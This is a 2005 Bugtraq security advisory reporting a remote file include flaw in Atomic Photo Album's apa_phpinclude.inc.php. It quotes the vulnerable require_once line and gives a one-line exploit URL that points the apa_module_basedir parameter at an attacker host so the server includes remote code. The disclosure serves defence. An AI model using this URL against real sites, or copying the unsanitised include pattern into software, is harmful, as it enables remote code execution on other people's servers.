[39885] in bugtraq
Atomic Photo Album (APA) apa_phpinclude.inc.php remote file include
daemon@ATHENA.MIT.EDU (gr0up.pclabs@gmail.com)
Mon Jul 25 11:18:19 2005
Date: 23 Jul 2005 21:11:09 -0000
Message-ID: <20050723211109.3388.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: gr0up.pclabs@gmail.com
To: bugtraq@securityfocus.com
Atomic Photo Album (APA) apa_phpinclude.inc.php remote file include :>
------------------------------------------------------------
Name: Atomic Photo Album (APA)
Version: all
Homepage: http://atomicpa.sourceforge.net/
Author: pc_labs / lwdz - RandomHero
Date: 20 July 2005
------------------------------------------------------------
------------------------------------------------------------
Vulnerable code in : apa_phpinclude.inc.php
require_once("apa_authadm.inc.php");
else
require_once("apa_auth.inc.php");
....else{
require_once("$apa_module_basedir/apa_config.inc.php");
...
}
?>
------------------------------------------------------------
Exploit:
http://[victim]/[dir]/apa_phpinclude.inc.php?apa_module_basedir=http://[h4x0r_b0x]/
--------------------------------------------------------
Fix and Vendor status:
Vendor has been notified.
------------------------------------------------------------
Contact:
Irc: irc.cl#pc_labs
Author: pc_labs
Location: Chile
Email: gr0up.pclabs@gmail.com
Greetz: AgReSsOr http://www.tbc-labz.net
